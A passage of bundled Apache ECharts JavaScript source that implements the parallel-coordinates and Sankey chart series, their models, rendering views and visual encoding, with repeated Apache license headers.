e.offsetY];\n        }\n    },\n\n    mouseup: function (e) {\n        var mouseDownPoint = this._mouseDownPoint;\n\n        if (checkTrigger(this, 'click') && mouseDownPoint) {\n            var point = [e.offsetX, e.offsetY];\n            var dist = Math.pow(mouseDownPoint[0] - point[0], 2)\n                + Math.pow(mouseDownPoint[1] - point[1], 2);\n\n            if (dist > CLICK_THRESHOLD) {\n                return;\n            }\n\n            var result = this._model.coordinateSystem.getSlidedAxisExpandWindow(\n                [e.offsetX, e.offsetY]\n            );\n\n            result.behavior !== 'none' && this._dispatchExpand({\n                axisExpandWindow: result.axisExpandWindow\n            });\n        }\n\n        this._mouseDownPoint = null;\n    },\n\n    mousemove: function (e) {\n        // Should do nothing when brushing.\n        if (this._mouseDownPoint || !checkTrigger(this, 'mousemove')) {\n            return;\n        }\n        var model = this._model;\n        var result = model.coordinateSystem.getSlidedAxisExpandWindow(\n            [e.offsetX, e.offsetY]\n        );\n\n        var behavior = result.behavior;\n        behavior === 'jump' && this._throttledDispatchExpand.debounceNextCall(model.get('axisExpandDebounce'));\n        this._throttledDispatchExpand(\n            behavior === 'none'\n                ? null // Cancle the last trigger, in case that mouse slide out of the area quickly.\n                : {\n                    axisExpandWindow: result.axisExpandWindow,\n                    // Jumping uses animation, and sliding suppresses animation.\n                    animation: behavior === 'jump' ? null : false\n                }\n        );\n    }\n};\n\nfunction checkTrigger(view, triggerOn) {\n    var model = view._model;\n    return model.get('axisExpandable') && model.get('axisExpandTriggerOn') === triggerOn;\n}\n\nregisterPreprocessor(parallelPreprocessor);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nSeriesModel.extend({\n\n    type: 'series.parallel',\n\n    dependencies: ['parallel'],\n\n    visualColorAccessPath: 'lineStyle.color',\n\n    getInitialData: function (option, ecModel) {\n        var source = this.getSource();\n\n        setEncodeAndDimensions(source, this);\n\n        return createListFromArray(source, this);\n    },\n\n    /**\n     * User can get data raw indices on 'axisAreaSelected' event received.\n     *\n     * @public\n     * @param {string} activeState 'active' or 'inactive' or 'normal'\n     * @return {Array.<number>} Raw indices\n     */\n    getRawIndicesByActiveState: function (activeState) {\n        var coordSys = this.coordinateSystem;\n        var data = this.getData();\n        var indices = [];\n\n        coordSys.eachActiveState(data, function (theActiveState, dataIndex) {\n            if (activeState === theActiveState) {\n                indices.push(data.getRawIndex(dataIndex));\n            }\n        });\n\n        return indices;\n    },\n\n    defaultOption: {\n        zlevel: 0,                  // 一级层叠\n        z: 2,                       // 二级层叠\n\n        coordinateSystem: 'parallel',\n        parallelIndex: 0,\n\n        label: {\n            show: false\n        },\n\n        inactiveOpacity: 0.05,\n        activeOpacity: 1,\n\n        lineStyle: {\n            width: 1,\n            opacity: 0.45,\n            type: 'solid'\n        },\n        emphasis: {\n            label: {\n                show: false\n            }\n        },\n\n        progressive: 500,\n        smooth: false, // true | false | number\n\n        animationEasing: 'linear'\n    }\n});\n\nfunction setEncodeAndDimensions(source, seriesModel) {\n    // The mapping of parallelAxis dimension to data dimension can\n    // be specified in parallelAxis.option.dim. For example, if\n    // parallelAxis.option.dim is 'dim3', it mapping to the third\n    // dimension of data. But `data.encode` has higher priority.\n    // Moreover, parallelModel.dimension should not be regarded as data\n    // dimensions. Consider dimensions = ['dim4', 'dim2', 'dim6'];\n\n    if (source.encodeDefine) {\n        return;\n    }\n\n    var parallelModel = seriesModel.ecModel.getComponent(\n        'parallel', seriesModel.get('parallelIndex')\n    );\n    if (!parallelModel) {\n        return;\n    }\n\n    var encodeDefine = source.encodeDefine = createHashMap();\n    each$1(parallelModel.dimensions, function (axisDim) {\n        var dataDimIndex = convertDimNameToNumber(axisDim);\n        encodeDefine.set(axisDim, dataDimIndex);\n    });\n}\n\nfunction convertDimNameToNumber(dimName) {\n    return +dimName.replace('dim', '');\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar DEFAULT_SMOOTH = 0.3;\n\nvar ParallelView = Chart.extend({\n\n    type: 'parallel',\n\n    init: function () {\n\n        /**\n         * @type {module:zrender/container/Group}\n         * @private\n         */\n        this._dataGroup = new Group();\n\n        this.group.add(this._dataGroup);\n\n        /**\n         * @type {module:echarts/data/List}\n         */\n        this._data;\n\n        /**\n         * @type {boolean}\n         */\n        this._initialized;\n    },\n\n    /**\n     * @override\n     */\n    render: function (seriesModel, ecModel, api, payload) {\n        var dataGroup = this._dataGroup;\n        var data = seriesModel.getData();\n        var oldData = this._data;\n        var coordSys = seriesModel.coordinateSystem;\n        var dimensions = coordSys.dimensions;\n        var seriesScope = makeSeriesScope$2(seriesModel);\n\n        data.diff(oldData)\n            .add(add)\n            .update(update)\n            .remove(remove)\n            .execute();\n\n        function add(newDataIndex) {\n            var line = addEl(data, dataGroup, newDataIndex, dimensions, coordSys);\n            updateElCommon(line, data, newDataIndex, seriesScope);\n        }\n\n        function update(newDataIndex, oldDataIndex) {\n            var line = oldData.getItemGraphicEl(oldDataIndex);\n            var points = createLinePoints(data, newDataIndex, dimensions, coordSys);\n            data.setItemGraphicEl(newDataIndex, line);\n            var animationModel = (payload && payload.animation === false) ? null : seriesModel;\n            updateProps(line, {shape: {points: points}}, animationModel, newDataIndex);\n\n            updateElCommon(line, data, newDataIndex, seriesScope);\n        }\n\n        function remove(oldDataIndex) {\n            var line = oldData.getItemGraphicEl(oldDataIndex);\n            dataGroup.remove(line);\n        }\n\n        // First create\n        if (!this._initialized) {\n            this._initialized = true;\n            var clipPath = createGridClipShape(\n                coordSys, seriesModel, function () {\n                    // Callback will be invoked immediately if there is no animation\n                    setTimeout(function () {\n                        dataGroup.removeClipPath();\n                    });\n                }\n            );\n            dataGroup.setClipPath(clipPath);\n        }\n\n        this._data = data;\n    },\n\n    incrementalPrepareRender: function (seriesModel, ecModel, api) {\n        this._initialized = true;\n        this._data = null;\n        this._dataGroup.removeAll();\n    },\n\n    incrementalRender: function (taskParams, seriesModel, ecModel) {\n        var data = seriesModel.getData();\n        var coordSys = seriesModel.coordinateSystem;\n        var dimensions = coordSys.dimensions;\n        var seriesScope = makeSeriesScope$2(seriesModel);\n\n        for (var dataIndex = taskParams.start; dataIndex < taskParams.end; dataIndex++) {\n            var line = addEl(data, this._dataGroup, dataIndex, dimensions, coordSys);\n            line.incremental = true;\n            updateElCommon(line, data, dataIndex, seriesScope);\n        }\n    },\n\n    dispose: function () {},\n\n    // _renderForProgressive: function (seriesModel) {\n    //     var dataGroup = this._dataGroup;\n    //     var data = seriesModel.getData();\n    //     var oldData = this._data;\n    //     var coordSys = seriesModel.coordinateSystem;\n    //     var dimensions = coordSys.dimensions;\n    //     var option = seriesModel.option;\n    //     var progressive = option.progressive;\n    //     var smooth = option.smooth ? SMOOTH : null;\n\n    //     // In progressive animation is disabled, so use simple data diff,\n    //     // which effects performance less.\n    //     // (Typically performance for data with length 7000+ like:\n    //     // simpleDiff: 60ms, addEl: 184ms,\n    //     // in RMBP 2.4GHz intel i7, OSX 10.9 chrome 50.0.2661.102 (64-bit))\n    //     if (simpleDiff(oldData, data, dimensions)) {\n    //         dataGroup.removeAll();\n    //         data.each(function (dataIndex) {\n    //             addEl(data, dataGroup, dataIndex, dimensions, coordSys);\n    //         });\n    //     }\n\n    //     updateElCommon(data, progressive, smooth);\n\n    //     // Consider switch between progressive and not.\n    //     data.__plProgressive = true;\n    //     this._data = data;\n    // },\n\n    /**\n     * @override\n     */\n    remove: function () {\n        this._dataGroup && this._dataGroup.removeAll();\n        this._data = null;\n    }\n});\n\nfunction createGridClipShape(coordSys, seriesModel, cb) {\n    var parallelModel = coordSys.model;\n    var rect = coordSys.getRect();\n    var rectEl = new Rect({\n        shape: {\n            x: rect.x,\n            y: rect.y,\n            width: rect.width,\n            height: rect.height\n        }\n    });\n\n    var dim = parallelModel.get('layout') === 'horizontal' ? 'width' : 'height';\n    rectEl.setShape(dim, 0);\n    initProps(rectEl, {\n        shape: {\n            width: rect.width,\n            height: rect.height\n        }\n    }, seriesModel, cb);\n    return rectEl;\n}\n\nfunction createLinePoints(data, dataIndex, dimensions, coordSys) {\n    var points = [];\n    for (var i = 0; i < dimensions.length; i++) {\n        var dimName = dimensions[i];\n        var value = data.get(data.mapDimension(dimName), dataIndex);\n        if (!isEmptyValue(value, coordSys.getAxis(dimName).type)) {\n            points.push(coordSys.dataToPoint(value, dimName));\n        }\n    }\n    return points;\n}\n\nfunction addEl(data, dataGroup, dataIndex, dimensions, coordSys) {\n    var points = createLinePoints(data, dataIndex, dimensions, coordSys);\n    var line = new Polyline({\n        shape: {points: points},\n        silent: true,\n        z2: 10\n    });\n    dataGroup.add(line);\n    data.setItemGraphicEl(dataIndex, line);\n    return line;\n}\n\nfunction makeSeriesScope$2(seriesModel) {\n    var smooth = seriesModel.get('smooth', true);\n    smooth === true && (smooth = DEFAULT_SMOOTH);\n    return {\n        lineStyle: seriesModel.getModel('lineStyle').getLineStyle(),\n        smooth: smooth != null ? smooth : DEFAULT_SMOOTH\n    };\n}\n\nfunction updateElCommon(el, data, dataIndex, seriesScope) {\n    var lineStyle = seriesScope.lineStyle;\n\n    if (data.hasItemOption) {\n        var lineStyleModel = data.getItemModel(dataIndex).getModel('lineStyle');\n        lineStyle = lineStyleModel.getLineStyle();\n    }\n\n    el.useStyle(lineStyle);\n\n    var elStyle = el.style;\n    elStyle.fill = null;\n    // lineStyle.color have been set to itemVisual in module:echarts/visual/seriesColor.\n    elStyle.stroke = data.getItemVisual(dataIndex, 'color');\n    // lineStyle.opacity have been set to itemVisual in parallelVisual.\n    elStyle.opacity = data.getItemVisual(dataIndex, 'opacity');\n\n    seriesScope.smooth && (el.shape.smooth = seriesScope.smooth);\n}\n\n// function simpleDiff(oldData, newData, dimensions) {\n//     var oldLen;\n//     if (!oldData\n//         || !oldData.__plProgressive\n//         || (oldLen = oldData.count()) !== newData.count()\n//     ) {\n//         return true;\n//     }\n\n//     var dimLen = dimensions.length;\n//     for (var i = 0; i < oldLen; i++) {\n//         for (var j = 0; j < dimLen; j++) {\n//             if (oldData.get(dimensions[j], i) !== newData.get(dimensions[j], i)) {\n//                 return true;\n//             }\n//         }\n//     }\n\n//     return false;\n// }\n\n// FIXME\n// 公用方法?\nfunction isEmptyValue(val, axisType) {\n    return axisType === 'category'\n        ? val == null\n        : (val == null || isNaN(val)); // axisType === 'value'\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n\nvar opacityAccessPath$1 = ['lineStyle', 'normal', 'opacity'];\n\nvar parallelVisual = {\n\n    seriesType: 'parallel',\n\n    reset: function (seriesModel, ecModel, api) {\n\n        var itemStyleModel = seriesModel.getModel('itemStyle');\n        var lineStyleModel = seriesModel.getModel('lineStyle');\n        var globalColors = ecModel.get('color');\n\n        var color = lineStyleModel.get('color')\n            || itemStyleModel.get('color')\n            || globalColors[seriesModel.seriesIndex % globalColors.length];\n        var inactiveOpacity = seriesModel.get('inactiveOpacity');\n        var activeOpacity = seriesModel.get('activeOpacity');\n        var lineStyle = seriesModel.getModel('lineStyle').getLineStyle();\n\n        var coordSys = seriesModel.coordinateSystem;\n        var data = seriesModel.getData();\n\n        var opacityMap = {\n            normal: lineStyle.opacity,\n            active: activeOpacity,\n            inactive: inactiveOpacity\n        };\n\n        data.setVisual('color', color);\n\n        function progress(params, data) {\n            coordSys.eachActiveState(data, function (activeState, dataIndex) {\n                var opacity = opacityMap[activeState];\n                if (activeState === 'normal' && data.hasItemOption) {\n                    var itemOpacity = data.getItemModel(dataIndex).get(opacityAccessPath$1, true);\n                    itemOpacity != null && (opacity = itemOpacity);\n                }\n                data.setItemVisual(dataIndex, 'opacity', opacity);\n            }, params.start, params.end);\n        }\n\n        return {progress: progress};\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nregisterVisual(parallelVisual);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar SankeySeries = SeriesModel.extend({\n\n    type: 'series.sankey',\n\n    layoutInfo: null,\n\n    levelModels: null,\n\n    /**\n     * Init a graph data structure from data in option series\n     *\n     * @param  {Object} option  the object used to config echarts view\n     * @return {module:echarts/data/List} storage initial data\n     */\n    getInitialData: function (option, ecModel) {\n        var links = option.edges || option.links;\n        var nodes = option.data || option.nodes;\n        var levels = option.levels;\n        var levelModels = this.levelModels = {};\n\n        for (var i = 0; i < levels.length; i++) {\n            if (levels[i].depth != null && levels[i].depth >= 0) {\n                levelModels[levels[i].depth] = new Model(levels[i], this, ecModel);\n            }\n            else {\n                if (__DEV__) {\n                    throw new Error('levels[i].depth is mandatory and should be natural number');\n                }\n            }\n        }\n        if (nodes && links) {\n            var graph = createGraphFromNodeEdge(nodes, links, this, true, beforeLink);\n            return graph.data;\n        }\n        function beforeLink(nodeData, edgeData) {\n            nodeData.wrapMethod('getItemModel', function (model, idx) {\n                model.customizeGetParent(function (path) {\n                    var parentModel = this.parentModel;\n                    var nodeDepth = parentModel.getData().getItemLayout(idx).depth;\n                    var levelModel = parentModel.levelModels[nodeDepth];\n                    return levelModel || this.parentModel;\n                });\n                return model;\n            });\n\n            edgeData.wrapMethod('getItemModel', function (model, idx) {\n                model.customizeGetParent(function (path) {\n                    var parentModel = this.parentModel;\n                    var edge = parentModel.getGraph().getEdgeByIndex(idx);\n                    var depth = edge.node1.getLayout().depth;\n                    var levelModel = parentModel.levelModels[depth];\n                    return levelModel || this.parentModel;\n                });\n                return model;\n            });\n        }\n    },\n\n    setNodePosition: function (dataIndex, localPosition) {\n        var dataItem = this.option.data[dataIndex];\n        dataItem.localX = localPosition[0];\n        dataItem.localY = localPosition[1];\n    },\n\n    /**\n     * Return the graphic data structure\n     *\n     * @return {module:echarts/data/Graph} graphic data structure\n     */\n    getGraph: function () {\n        return this.getData().graph;\n    },\n\n    /**\n     * Get edge data of graphic data structure\n     *\n     * @return {module:echarts/data/List} data structure of list\n     */\n    getEdgeData: function () {\n        return this.getGraph().edgeData;\n    },\n\n    /**\n     * @override\n     */\n    formatTooltip: function (dataIndex, multipleSeries, dataType) {\n        // dataType === 'node' or empty do not show tooltip by default\n        if (dataType === 'edge') {\n            var params = this.getDataParams(dataIndex, dataType);\n            var rawDataOpt = params.data;\n            var html = rawDataOpt.source + ' -- ' + rawDataOpt.target;\n            if (params.value) {\n                html += ' : ' + params.value;\n            }\n            return encodeHTML(html);\n        }\n        else if (dataType === 'node') {\n            var node = this.getGraph().getNodeByIndex(dataIndex);\n            var value = node.getLayout().value;\n            var name = this.getDataParams(dataIndex, dataType).data.name;\n            if (value) {\n                var html = name + ' : ' + value;\n            }\n            return encodeHTML(html);\n        }\n        return SankeySeries.superCall(this, 'formatTooltip', dataIndex, multipleSeries);\n    },\n\n    optionUpdated: function () {\n        var option = this.option;\n        if (option.focusNodeAdjacency === true) {\n            option.focusNodeAdjacency = 'allEdges';\n        }\n    },\n\n    // Override Series.getDataParams()\n    getDataParams: function (dataIndex, dataType) {\n        var params = SankeySeries.superCall(this, 'getDataParams', dataIndex, dataType);\n        if (params.value == null && dataType === 'node') {\n            var node = this.getGraph().getNodeByIndex(dataIndex);\n            var nodeValue = node.getLayout().value;\n            params.value = nodeValue;\n        }\n        return params;\n    },\n\n    defaultOption: {\n        zlevel: 0,\n        z: 2,\n\n        coordinateSystem: 'view',\n\n        layout: null,\n\n        // The position of the whole view\n        left: '5%',\n        top: '5%',\n        right: '20%',\n        bottom: '5%',\n\n        // Value can be 'vertical'\n        orient: 'horizontal',\n\n        // The dx of the node\n        nodeWidth: 20,\n\n        // The vertical distance between two nodes\n        nodeGap: 8,\n\n        // Control if the node can move or not\n        draggable: true,\n\n        // Value can be 'inEdges', 'outEdges', 'allEdges', true (the same as 'allEdges').\n        focusNodeAdjacency: false,\n\n        // The number of iterations to change the position of the node\n        layoutIterations: 32,\n\n        label: {\n            show: true,\n            position: 'right',\n            color: '#000',\n            fontSize: 12\n        },\n\n        levels: [],\n\n        // Value can be 'left' or 'right'\n        nodeAlign: 'justify',\n\n        itemStyle: {\n            borderWidth: 1,\n            borderColor: '#333'\n        },\n\n        lineStyle: {\n            color: '#314656',\n            opacity: 0.2,\n            curveness: 0.5\n        },\n\n        emphasis: {\n            label: {\n                show: true\n            },\n            lineStyle: {\n                opacity: 0.5\n            }\n        },\n\n        animationEasing: 'linear',\n\n        animationDuration: 1000\n    }\n\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar nodeOpacityPath$1 = ['itemStyle', 'opacity'];\nvar hoverNodeOpacityPath = ['emphasis', 'itemStyle', 'opacity'];\nvar lineOpacityPath$1 = ['lineStyle', 'opacity'];\nvar hoverLineOpacityPath = ['emphasis', 'lineStyle', 'opacity'];\n\nfunction getItemOpacity$1(item, opacityPath) {\n    return item.getVisual('opacity') || item.getModel().get(opacityPath);\n}\n\nfunction fadeOutItem$1(item, opacityPath, opacityRatio) {\n    var el = item.getGraphicEl();\n    var opacity = getItemOpacity$1(item, opacityPath);\n\n    if (opacityRatio != null) {\n        opacity == null && (opacity = 1);\n        opacity *= opacityRatio;\n    }\n\n    el.downplay && el.downplay();\n    el.traverse(function (child) {\n        if (child.type !== 'group') {\n            child.setStyle('opacity', opacity);\n        }\n    });\n}\n\nfunction fadeInItem$1(item, opacityPath) {\n    var opacity = getItemOpacity$1(item, opacityPath);\n    var el = item.getGraphicEl();\n\n    el.traverse(function (child) {\n        if (child.type !== 'group') {\n            child.setStyle('opacity', opacity);\n        }\n    });\n\n    // Support emphasis here.\n    el.highlight && el.highlight();\n}\n\nvar SankeyShape = extendShape({\n    shape: {\n        x1: 0, y1: 0,\n        x2: 0, y2: 0,\n        cpx1: 0, cpy1: 0,\n        cpx2: 0, cpy2: 0,\n        extent: 0,\n        orient: ''\n    },\n\n    buildPath: function (ctx, shape) {\n        var extent = shape.extent;\n        ctx.moveTo(shape.x1, shape.y1);\n        ctx.bezierCurveTo(\n            shape.cpx1, shape.cpy1,\n            shape.cpx2, shape.cpy2,\n            shape.x2, shape.y2\n        );\n        if (shape.orient === 'vertical') {\n            ctx.lineTo(shape.x2 + extent, shape.y2);\n            ctx.bezierCurveTo(\n                shape.cpx2 + extent, shape.cpy2,\n                shape.cpx1 + extent, shape.cpy1,\n                shape.x1 + extent, shape.y1\n            );\n        }\n        else {\n            ctx.lineTo(shape.x2, shape.y2 + extent);\n            ctx.bezierCurveTo(\n                shape.cpx2, shape.cpy2 + extent,\n                shape.cpx1, shape.cpy1 + extent,\n                shape.x1, shape.y1 + extent\n            );\n        }\n        ctx.closePath();\n    },\n\n    highlight: function () {\n        this.trigger('emphasis');\n    },\n\n    downplay: function () {\n        this.trigger('normal');\n    }\n});\n\nextendChartView({\n\n    type: 'sankey',\n\n    /**\n     * @private\n     * @type {module:echarts/chart/sankey/SankeySeries}\n     */\n    _model: null,\n\n    /**\n     * @private\n     * @type {boolean}\n     */\n    _focusAdjacencyDisabled: false,\n\n    render: function (seriesModel, ecModel, api) {\n        var sankeyView = this;\n        var graph = seriesModel.getGraph();\n        var group = this.group;\n        var layoutInfo = seriesModel.layoutInfo;\n        // view width\n        var width = layoutInfo.width;\n        // view height\n        var height = layoutInfo.height;\n        var nodeData = seriesModel.getData();\n        var edgeData = seriesModel.getData('edge');\n        var orient = seriesModel.get('orient');\n\n        this._model = seriesModel;\n\n        group.removeAll();\n\n        group.attr('position', [layoutInfo.x, layoutInfo.y]);\n\n        // generate a bezire Curve for each edge\n        graph.eachEdge(function (edge) {\n            var curve = new SankeyShape();\n            curve.dataIndex = edge.dataIndex;\n            curve.seriesIndex = seriesModel.seriesIndex;\n            curve.dataType = 'edge';\n            var lineStyleModel = edge.getModel('lineStyle');\n            var curvature = lineStyleModel.get('curveness');\n            var n1Layout = edge.node1.getLayout();\n            var node1Model = edge.node1.getModel();\n            var dragX1 = node1Model.get('localX');\n            var dragY1 = node1Model.get('localY');\n            var n2Layout = edge.node2.getLayout();\n            var node2Model = edge.node2.getModel();\n            var dragX2 = node2Model.get('localX');\n            var dragY2 = node2Model.get('localY');\n            var edgeLayout = edge.getLayout();\n            var x1;\n            var y1;\n            var x2;\n            var y2;\n            var cpx1;\n            var cpy1;\n            var cpx2;\n            var cpy2;\n\n            curve.shape.extent = Math.max(1, edgeLayout.dy);\n            curve.shape.orient = orient;\n\n            if (orient === 'vertical') {\n                x1 = (dragX1 != null ? dragX1 * width : n1Layout.x) + edgeLayout.sy;\n                y1 = (dragY1 != null ? dragY1 * height : n1Layout.y) + n1Layout.dy;\n                x2 = (dragX2 != null ? dragX2 * width : n2Layout.x) + edgeLayout.ty;\n                y2 = dragY2 != null ? dragY2 * height : n2Layout.y;\n                cpx1 = x1;\n                cpy1 = y1 * (1 - curvature) + y2 * curvature;\n                cpx2 = x2;\n                cpy2 = y1 * curvature + y2 * (1 - curvature);\n            }\n            else {\n                x1 = (dragX1 != null ? dragX1 * width : n1Layout.x) + n1Layout.dx;\n                y1 = (dragY1 != null ? dragY1 * height : n1Layout.y) + edgeLayout.sy;\n                x2 = dragX2 != null ? dragX2 * width : n2Layout.x;\n                y2 = (dragY2 != null ? dragY2 * height : n2Layout.y) + edgeLayout.ty;\n                cpx1 = x1 * (1 - curvature) + x2 * curvature;\n                cpy1 = y1;\n                cpx2 = x1 * curvature + x2 * (1 - curvature);\n                cpy2 = y2;\n            }\n\n            curve.setShape({\n                x1: x1,\n                y1: y1,\n                x2: x2,\n                y2: y2,\n                cpx1: cpx1,\n                cpy1: cpy1,\n                cpx2: cpx2,\n                cpy2: cpy2\n            });\n\n            curve.setStyle(lineStyleModel.getItemStyle());\n            // Special color, use source node color or target node color\n            switch (curve.style.fill) {\n                case 'source':\n                    curve.style.fill = edge.node1.getVisual('color');\n                    break;\n                case 'target':\n                    curve.style.fill = edge.node2.getVisual('color');\n                    break;\n            }\n\n            setHoverStyle(curve, edge.getModel('emphasis.lineStyle').getItemStyle());\n\n            group.add(curve);\n\n            edgeData.setItemGraphicEl(edge.dataIndex, curve);\n        });\n\n        // Generate a rect for each node\n        graph.eachNode(function (node) {\n            var layout = node.getLayout();\n            var itemModel = node.getModel();\n            var dragX = itemModel.get('localX');\n            var dragY = itemModel.get('localY');\n            var labelModel = itemModel.getModel('label');\n            var labelHoverModel = itemModel.getModel('emphasis.label');\n\n            var rect = new Rect({\n                shape: {\n                    x: dragX != null ? dragX * width : layout.x,\n                    y: dragY != null ? dragY * height : layout.y,\n                    width: layout.dx,\n                    height: layout.dy\n                },\n                style: itemModel.getModel('itemStyle').getItemStyle()\n            });\n\n            var hoverStyle = node.getModel('emphasis.itemStyle').getItemStyle();\n\n            setLabelStyle(\n                rect.style, hoverStyle, labelModel, labelHoverModel,\n                {\n                    labelFetcher: seriesModel,\n                    labelDataIndex: node.dataIndex,\n                    defaultText: node.id,\n                    isRectText: true\n                }\n            );\n\n            rect.setStyle('fill', node.getVisual('color'));\n\n            setHoverStyle(rect, hoverStyle);\n\n            group.add(rect);\n\n            nodeData.setItemGraphicEl(node.dataIndex, rect);\n\n            rect.dataType = 'node';\n        });\n\n        nodeData.eachItemGraphicEl(function (el, dataIndex) {\n            var itemModel = nodeData.getItemModel(dataIndex);\n            if (itemModel.get('draggable')) {\n                el.drift = function (dx, dy) {\n                    sankeyView._focusAdjacencyDisabled = true;\n                    this.shape.x += dx;\n                    this.shape.y += dy;\n                    this.dirty();\n                    api.dispatchAction({\n                        type: 'dragNode',\n                        seriesId: seriesModel.id,\n                        dataIndex: nodeData.getRawIndex(dataIndex),\n                        localX: this.shape.x / width,\n                        localY: this.shape.y / height\n                    });\n                };\n                el.ondragend = function () {\n                    sankeyView._focusAdjacencyDisabled = false;\n                };\n                el.draggable = true;\n                el.cursor = 'move';\n            }\n\n            el.highlight = function () {\n                this.trigger('emphasis');\n            };\n\n            el.downplay = function () {\n                this.trigger('normal');\n            };\n\n            el.focusNodeAdjHandler && el.off('mouseover', el.focusNodeAdjHandler);\n            el.unfocusNodeAdjHandler && el.off('mouseout', el.unfocusNodeAdjHandler);\n\n            if (itemModel.get('focusNodeAdjacency')) {\n                el.on('mouseover', el.focusNodeAdjHandler = function () {\n                    if (!sankeyView._focusAdjacencyDisabled) {\n                        sankeyView._clearTimer();\n                        api.dispatchAction({\n                            type: 'focusNodeAdjacency',\n                            seriesId: seriesModel.id,\n                            dataIndex: el.dataIndex\n                        });\n                    }\n                });\n\n                el.on('mouseout', el.unfocusNodeAdjHandler = function () {\n                    if (!sankeyView._focusAdjacencyDisabled) {\n                        sankeyView._dispatchUnfocus(api);\n                    }\n                });\n            }\n        });\n\n        edgeData.eachItemGraphicEl(function (el, dataIndex) {\n            var edgeModel = edgeData.getItemModel(dataIndex);\n\n            el.focusNodeAdjHandler && el.off('mouseover', el.focusNodeAdjHandler);\n            el.unfocusNodeAdjHandler && el.off('mouseout', el.unfocusNodeAdjHandler);\n\n            if (edgeModel.get('focusNodeAdjacency')) {\n                el.on('mouseover', el.focusNodeAdjHandler = function () {\n                    if (!sankeyView._focusAdjacencyDisabled) {\n                        sankeyView._clearTimer();\n                        api.dispatchAction({\n                            type: 'focusNodeAdjacency',\n                            seriesId: seriesModel.id,\n                            edgeDataIndex: el.dataIndex\n                        });\n                    }\n                });\n\n                el.on('mouseout', el.unfocusNodeAdjHandler = function () {\n                    if (!sankeyView._focusAdjacencyDisabled) {\n                        sankeyView._dispatchUnfocus(api);\n                    }\n                });\n            }\n        });\n\n        if (!this._data && seriesModel.get('animation')) {\n            group.setClipPath(createGridClipShape$1(group.getBoundingRect(), seriesModel, function () {\n                group.removeClipPath();\n            }));\n        }\n\n        this._data = seriesModel.getData();\n    },\n\n    dispose: function () {\n        this._clearTimer();\n    },\n\n    _dispatchUnfocus: function (api) {\n        var self = this;\n        this._clearTimer();\n        this._unfocusDelayTimer = setTimeout(function () {\n            self._unfocusDelayTimer = null;\n            api.dispatchAction({\n                type: 'unfocusNodeAdjacency',\n                seriesId: self._model.id\n            });\n        }, 500);\n    },\n\n    _clearTimer: function () {\n        if (this._unfocusDelayTimer) {\n            clearTimeout(this._unfocusDelayTimer);\n            this._unfocusDelayTimer = null;\n        }\n    },\n\n    focusNodeAdjacency: function (seriesModel, ecModel, api, payload) {\n        var data = seriesModel.getData();\n        var graph = data.graph;\n        var dataIndex = payload.dataIndex;\n        var itemModel = data.getItemModel(dataIndex);\n        var edgeDataIndex = payload.edgeDataIndex;\n\n        if (dataIndex == null && edgeDataIndex == null) {\n            return;\n        }\n        var node = graph.getNodeByIndex(dataIndex);\n        var edge = 